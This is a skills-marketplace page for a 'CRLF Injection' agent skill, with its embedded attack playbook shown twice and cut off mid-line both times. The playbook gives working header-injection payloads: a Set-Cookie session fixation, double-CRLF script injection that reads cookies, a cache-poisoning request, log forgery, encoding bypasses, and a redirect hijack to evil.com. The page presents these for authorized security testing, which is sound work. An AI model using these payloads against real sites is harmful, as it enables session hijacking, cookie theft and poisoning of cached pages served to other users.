Crlf Injection

Name: Crlf Injection
Author: yaklang

yaklang/hack-skills

Run a structured CRLF injection playbook when reflected user input can reach HTTP headers, redirects, Set-Cookie, or log lines.

Overview

CRLF Injection is an agent skill for the Ship phase that teaches HTTP response-splitting and header-injection techniques when user input is reflected in headers, redirects, cookies, or logs.

Install

npx skills add https://github.com/yaklang/hack-skills --skill crlf-injection

What is this skill?

Core model: CRLF (%0D%0A) splits headers or injects body via double CRLF
Detection probes and escalation paths to XSS, session fixation, and cache poisoning
Encoding and filter bypass patterns for scanners that miss CRLF
Cross-routes to ghost-bits-cast-attack for Java/WAF-blocked \r\n encodings
Chains into cache poisoning and SMTP/mail-client CRLF classes on Java stacks
Related routing to ghost-bits-cast-attack for Java CRLF when WAF blocks standard encodings

Compatible agents: Claude Code, Cursor, Codex, any compatible agent

Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 2/3 security scanners passed (skills.sh audits).

What problem does it solve?

You are shipping a web app or API and do not know whether reflected input can inject %0D%0A to add headers, poison caches, or escalate to XSS.

Who is it for?

Solo builders doing authorized security review on redirects, cookies, or header-reflecting endpoints before go-live.

Skip if: Teams that only need dependency scanning or SAST with no manual HTTP header testing—or use without explicit permission on third-party systems.

When should I use this skill?

User input reaches HTTP response headers, Location redirects, Set-Cookie values, or log files where CRLF can split or inject content.

What do I get? / Deliverables

After running the playbook you have concrete probes, bypass ideas, and chain notes (XSS, fixation, cache) to verify or rule out CRLF risk before release.

Probe payloads
Escalation chain notes
Bypass encoding variants

Recommended Skills

Azure Compliancemicrosoft/azure-skills

Azure Compliance is a Microsoft agent skill for solo builders and small teams who need structured security and complianc…373k installs·1.2k stars

Openclaw Secure Linux Cloudxixu-me/skills

OpenClaw Secure Linux Cloud guides a hardened VPS deployment—rootless Podman, loopback-only gateway, SSH-tunneled Contro…201k installs·61 stars

Entra Agent Idmicrosoft/azure-skills

entra-agent-id is a Microsoft-authored agent skill for provisioning and operating OAuth-capable identities tailored to A…99.1k installs·1.2k stars

Firebase Security Rules Auditorfirebase/agent-skills

Firebase Security Rules Auditor turns your agent into a senior penetration-style reviewer for Firestore rulesets. Solo b…40.3k installs·345 stars

Firestore Security Rules Auditorfirebase/agent-skills

Firestore-security-rules-auditor is a checker skill for solo builders and small teams shipping Firebase-backed apps who …20.3k installs·345 stars

Skill Vetteruseai-pro/openclaw-skills-security

Skill Vetter is a security-first OpenClaw agent skill that makes your coding agent behave like a pre-install auditor for…19.2k installs·62 stars

Journey fit

Primary fit

HTTP response-splitting and header injection are classic pre-release and security-review checks before you ship web apps and APIs. Maps to the security shelf because the skill is an offensive testing playbook, not general backend implementation.

How it compares

Use for CRLF-specific response splitting rather than generic OWASP cheat sheets or ad-hoc single-payload guesses.

Common Questions / FAQ

Who is crlf-injection for?

Indie developers and small teams who ship HTTP services and need a focused CRLF injection playbook during security review, often alongside other hack-skills in the same repo.

When should I use crlf-injection?

Use it in Ship when testing Location redirects, Set-Cookie reflection, custom response headers, or log injection; also when WAFs block normal %0D%0A and you need Java-specific byte-substitution routes documented in the skill.

Is crlf-injection safe to install?

It is documentation for offensive testing patterns—review the Security Audits panel on this Prism page and only run probes on systems you are authorized to test.

SKILL.md

READMESKILL.md - Crlf Injection

# SKILL: CRLF Injection — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: CRLF injection (HTTP response splitting) techniques. Covers header injection, response body injection via double CRLF, XSS escalation, cache poisoning, and encoding bypass. Often overlooked by scanners but chains into XSS, session fixation, and cache attacks.

## 0. RELATED ROUTING

- [ghost-bits-cast-attack](../ghost-bits-cast-attack/SKILL.md) when the target is a **Java service** and `%0D%0A` / `\r\n` encodings are WAF-blocked — substituting `瘍` (U+760D, low byte `\r`) and `瘊` (U+760A, low byte `\n`) injects a real CRLF through Angus Mail / Jakarta Mail SMTP, Apache HttpClient headers, JDK HttpServer responses, and ActiveJ HTTP (re-enables Jira CVE-2025-57733 and JDK CVE-2026-21933 classes)

## 1. CORE CONCEPT

CRLF = `\r\n` (Carriage Return + Line Feed, `%0D%0A`). HTTP headers are separated by CRLF. If user input is reflected in a response header without sanitization, injecting CRLF characters creates new headers or even a response body.

```
Normal: Location: /page?url=USER_INPUT
Attack: Location: /page?url=%0D%0ASet-Cookie:admin=true
Result: Two headers — Location + injected Set-Cookie
```

---

## 2. DETECTION

### Basic Probe

```text
%0D%0ANew-Header:injected

# In URL parameter:
https://target.com/redirect?url=%0D%0AX-Injected:true

# Check response headers for "X-Injected: true"
```

### Double CRLF — Body Injection

Two consecutive CRLF sequences end headers and start body:

```text
%0D%0A%0D%0A<script>alert(1)</script>

# Result:
HTTP/1.1 302 Found
Location: /page

<script>alert(1)</script>
```

---

## 3. EXPLOITATION SCENARIOS

### Session Fixation via Set-Cookie

```text
%0D%0ASet-Cookie:PHPSESSID=attacker_controlled_session_id
```

### XSS via Response Body

```text
%0D%0A%0D%0A<html><script>alert(document.cookie)</script></html>
```

### Cache Poisoning

If the response is cached by a CDN or proxy, injected headers/body are served to all users:

```text
GET /page?q=%0D%0AContent-Length:0%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:text/html%0D%0A%0D%0A<script>alert(1)</script>
```

### Log Injection

CRLF in log-visible fields (User-Agent, Referer) can forge log entries:

```text
User-Agent: normal%0D%0A127.0.0.1 - admin [date] "GET /admin" 200
```

---

## 4. FILTER BYPASS

| Filter | Bypass |
|---|---|
| Blocks `%0D%0A` | Try `%0D` alone, `%0A` alone, or `%E5%98%8A%E5%98%8D` (Unicode) |
| URL decodes once | Double-encode: `%250D%250A` |
| Strips `\r\n` literally | Use URL-encoded form |
| Blocks in value only | Inject in parameter name |

```text
# Unicode/UTF-8 bypass:
%E5%98%8A%E5%98%8D  → decoded as CRLF in some parsers

# Double URL encoding:
%250D%250A → server decodes to %0D%0A → interpreted as CRLF

# Partial injection (LF only):
%0A → some servers accept LF without CR
```

---

## 5. REAL-WORLD EXPLOITATION CHAINS

### CRLF + Session Fixation

```text
# Inject Set-Cookie via CRLF in redirect parameter:
?url=%0D%0ASet-Cookie:PHPSESSID=attacker_controlled_session_id

# Result:
HTTP/1.1 302 Found
Location: /page
Set-Cookie: PHPSESSID=attacker_controlled_session_id

# Victim uses attacker's session → attacker hijacks after login
```

### CRLF → XSS via Double CRLF Body Injection

```text
# Two CRLF sequences end headers and inject response body:
?url=%0D%0A%0D%0A<script>alert(document.cookie)</script>

# Result:
HTTP/1.1 302 Found
Location: /page

<script>alert(document.cookie)</script>
```

### CRLF in 302 Location → Redirect Hijack

```text
# Inject new Location header before the original:
?url=%0D%0ALocation:http://evil.com%0D%0A%0D%0A

# Some servers use the LAST Location header → redirect to evil.com
```

---

## 6. COMMON VULNERABLE PATTERNS

```php
// PHP — header() with us

What is this skill?

Core model: CRLF (%0D%0A) splits headers or injects body via double CRLF

Detection probes and escalation paths to XSS, session fixation, and cache poisoning

Encoding and filter bypass patterns for scanners that miss CRLF

Cross-routes to ghost-bits-cast-attack for Java/WAF-blocked \r\n encodings

Chains into cache poisoning and SMTP/mail-client CRLF classes on Java stacks

Related routing to ghost-bits-cast-attack for Java CRLF when WAF blocks standard encodings

Compatible agents: Claude Code, Cursor, Codex, any compatible agent

Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 2/3 security scanners passed (skills.sh audits).

Journey fit

Primary fit

SKILL.md

READMESKILL.md - Crlf Injection

# SKILL: CRLF Injection — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: CRLF injection (HTTP response splitting) techniques. Covers header injection, response body injection via double CRLF, XSS escalation, cache poisoning, and encoding bypass. Often overlooked by scanners but chains into XSS, session fixation, and cache attacks.

## 0. RELATED ROUTING

- [ghost-bits-cast-attack](../ghost-bits-cast-attack/SKILL.md) when the target is a **Java service** and `%0D%0A` / `\r\n` encodings are WAF-blocked — substituting `瘍` (U+760D, low byte `\r`) and `瘊` (U+760A, low byte `\n`) injects a real CRLF through Angus Mail / Jakarta Mail SMTP, Apache HttpClient headers, JDK HttpServer responses, and ActiveJ HTTP (re-enables Jira CVE-2025-57733 and JDK CVE-2026-21933 classes)

## 1. CORE CONCEPT

CRLF = `\r\n` (Carriage Return + Line Feed, `%0D%0A`). HTTP headers are separated by CRLF. If user input is reflected in a response header without sanitization, injecting CRLF characters creates new headers or even a response body.

```
Normal: Location: /page?url=USER_INPUT
Attack: Location: /page?url=%0D%0ASet-Cookie:admin=true
Result: Two headers — Location + injected Set-Cookie
```

---

## 2. DETECTION

### Basic Probe

```text
%0D%0ANew-Header:injected

# In URL parameter:
https://target.com/redirect?url=%0D%0AX-Injected:true

# Check response headers for "X-Injected: true"
```

### Double CRLF — Body Injection

Two consecutive CRLF sequences end headers and start body:

```text
%0D%0A%0D%0A<script>alert(1)</script>

# Result:
HTTP/1.1 302 Found
Location: /page

<script>alert(1)</script>
```

---

## 3. EXPLOITATION SCENARIOS

### Session Fixation via Set-Cookie

```text
%0D%0ASet-Cookie:PHPSESSID=attacker_controlled_session_id
```

### XSS via Response Body

```text
%0D%0A%0D%0A<html><script>alert(document.cookie)</script></html>
```

### Cache Poisoning

If the response is cached by a CDN or proxy, injected headers/body are served to all users:

```text
GET /page?q=%0D%0AContent-Length:0%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:text/html%0D%0A%0D%0A<script>alert(1)</script>
```

### Log Injection

CRLF in log-visible fields (User-Agent, Referer) can forge log entries:

```text
User-Agent: normal%0D%0A127.0.0.1 - admin [date] "GET /admin" 200
```

---

## 4. FILTER BYPASS

| Filter | Bypass |
|---|---|
| Blocks `%0D%0A` | Try `%0D` alone, `%0A` alone, or `%E5%98%8A%E5%98%8D` (Unicode) |
| URL decodes once | Double-encode: `%250D%250A` |
| Strips `\r\n` literally | Use URL-encoded form |
| Blocks in value only | Inject in parameter name |

```text
# Unicode/UTF-8 bypass:
%E5%98%8A%E5%98%8D  → decoded as CRLF in some parsers

# Double URL encoding:
%250D%250A → server decodes to %0D%0A → interpreted as CRLF

# Partial injection (LF only):
%0A → some servers accept LF without CR
```

---

## 5. REAL-WORLD EXPLOITATION CHAINS

### CRLF + Session Fixation

```text
# Inject Set-Cookie via CRLF in redirect parameter:
?url=%0D%0ASet-Cookie:PHPSESSID=attacker_controlled_session_id

# Result:
HTTP/1.1 302 Found
Location: /page
Set-Cookie: PHPSESSID=attacker_controlled_session_id

# Victim uses attacker's session → attacker hijacks after login
```

### CRLF → XSS via Double CRLF Body Injection

```text
# Two CRLF sequences end headers and inject response body:
?url=%0D%0A%0D%0A<script>alert(document.cookie)</script>

# Result:
HTTP/1.1 302 Found
Location: /page

<script>alert(document.cookie)</script>
```

### CRLF in 302 Location → Redirect Hijack

```text
# Inject new Location header before the original:
?url=%0D%0ALocation:http://evil.com%0D%0A%0D%0A

# Some servers use the LAST Location header → redirect to evil.com
```

---

## 6. COMMON VULNERABLE PATTERNS

```php
// PHP — header() with us

Overview

Install

What is this skill?

What problem does it solve?

Who is it for?

When should I use this skill?

What do I get? / Deliverables

Recommended Skills

Journey fit

Who is crlf-injection for?

When should I use crlf-injection?

Is crlf-injection safe to install?

SKILL.md

This week for builders

Overview

Install

What is this skill?

What problem does it solve?

Who is it for?

When should I use this skill?

What do I get? / Deliverables

Recommended Skills

Journey fit

Who is crlf-injection for?

When should I use crlf-injection?

Is crlf-injection safe to install?

SKILL.md